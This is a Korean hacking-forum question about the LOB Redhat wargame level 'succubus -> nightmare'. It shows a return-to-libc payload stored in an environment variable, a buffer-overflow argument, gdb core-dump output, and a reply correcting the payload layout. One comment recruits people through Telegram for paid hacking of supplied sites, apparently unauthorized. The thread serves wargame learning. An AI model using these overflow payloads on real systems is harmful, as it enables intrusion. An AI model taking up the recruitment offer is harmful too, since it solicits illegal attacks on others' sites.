시스템 해킹

1574,

2/79

turttle2s

[LOB Redhat] succubus -> nightmare

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1981 [복사]

도저히 이해가 안가서 질문드립니다

제가 원하는 시나리오는,

strpy로 'AAAA'의 위치에 RTL코드가 들어있는 환경변수의 주소를 복사해서 strcpy가 끝난 후 ret시 RTL이 실행되게 하는 것 입니다.

일단 RTL 코드가 들어있는 환경변수를 만듭니다.

================================================
$ export WEAPON=`python -c 'print "\xe0\x8a\x05\x40"+"aaaa"+"\xf9\xbf\x0f\x40"+"\x90"*1000'`
================================================
"\x90"*1000 은 제가 환경변수 위치를 찾기 편하게 하기위해 추가했습니다.

이제부터 편의상 환경변수를 "RTL 코드" 라고 부르겠습니다.

그리고 core 파일 생성을 위해 아래 payload를 넣습니다.
================================================

./nightmare `python -c 'print "a"*44+"\x10\x84\x04\x08"+"AAAA"+"BBBB"+"CCCC"+"DDDD"'`
================================================

1. "AAAA"는 문제에서 붙여주는 문자열 입니다.
2. "BBBB"는 "AAAA"의 주소입니다. RTL 코드의 주소로 바뀌게 할 것입니다.
3. "CCCC"는 "DDDD"의 주소입니다. strcpy()에서 CCCC를 포인터로 사용하기 때문에 "AAAA"에는 "DDDD"값이 들어가게 될것입니다.
4. "DDDD"는 RTL 코드의 주소입니다.

그리고 gdb로 core 파일을 열어봅니다.
================================================
strcpy (dest=0x42424242 <Address 0x42424242 out of bounds>, src=0x43434343 <Address 0x43434343 out of bounds>)
    at ../sysdeps/generic/strcpy.c:37
../sysdeps/generic/strcpy.c: No such file or directory.
================================================
일단 strcpy.c 가 없다고 뜹니다. (이 오류가 왜 뜨는지는 모르겠습니다. 처음에는 gdb상에서 접근이 안되기 때문에 저런 오류가 뜨는걸로 알고있었는데 strcpy의 코드는 잘만 보여주더군요;;)

여기서 첫번째로 이해가 안되는 부분입니다.
================================================
(gdb) x/30wx $esp
0xbffff688:        "0x4000ae60"        0x61616161        0x41414141        0x42424242
0xbffff698:        0x43434343        0x44444444        0x00000000        0x08048420
0xbffff6a8:        0x00000000        0x08048441        0x080486b4        0x00000002
0xbffff6b8:        0xbffff6d4        0x08048350        0x0804877c        0x4000ae60
0xbffff6c8:        0xbffff6cc        0x40013e90        0x00000002        0xbffff7e0
0xbffff6d8:        0xbffff7ec        0x00000000        0xbffff82d        0xbffff84a
0xbffff6e8:        0xbffff863        0xbffff882        0xbffffc7e        0xbffffca0
0xbffff6f8:        0xbffffcae        0xbffffe71
================================================

제가 "로 묶어놓은 부분입니다.
저 주소의 코드를 보니 <_dl_fini> 부분으로 나오더군요.. 왜 갑자기 저게 생겼는지 모르겠고,
그 뒤의 4바이트를 보시면 0x61616161 이 들어있습니다. 원래 strcpy@plt 자리에 말이죠.

이것말고도 이해가 안되는 부분이 더 있는데, 글을 쓰다보니 이 문제를 먼저 해결하고 나서 삽질을 더 해봐야겠다는 생각에 일단 여기까지만 질문드려봅니다.

서큐버스한테 제대로 걸린 것 같습니다 ㅠㅠㅠ  here to stay.....

Hit : 1650 Date : 2019/09/26 08:15


ss4747	안녕하세요!! 모의해킹 가능자 모집 중인 해외업체입니다 업무의 진행방식은 프리랜서 형식으로 저희가 제공해드린 사이트 모의해킹 성공시 건당 으로 지급해드립니다 자세한안내사항및 기타문의는 텔래그램 ss4747 여기로 연락주시면 상세하게 알려드리겠습니다	2019/10/04
dnjsdnwja	"AAAA"을 원하는 return address("\xe0\x8a\x05\x40")로 바꾸고 뒤의 argument를 pass해주기 위해서는, "CCCC"에 DDDD의 주소를 넣지않고 그 자리에 그냥 DDDD를 넣어야 할 것으로 보이네요. 만약 "CCCC"에 DDDD의 주소를 넣으신다면 "AAAA"에는 그냥 환경변수 주소만 들어가고 이것은 원하시는 결과가 아니라고 생각됩니다.	2019/12/18
turttle2s	dnjsdnwja 답변 감사합니다. 이제 봤어요 ㅋㅋ 생각해보니까 제가 신중치 못했네요..	2019/12/23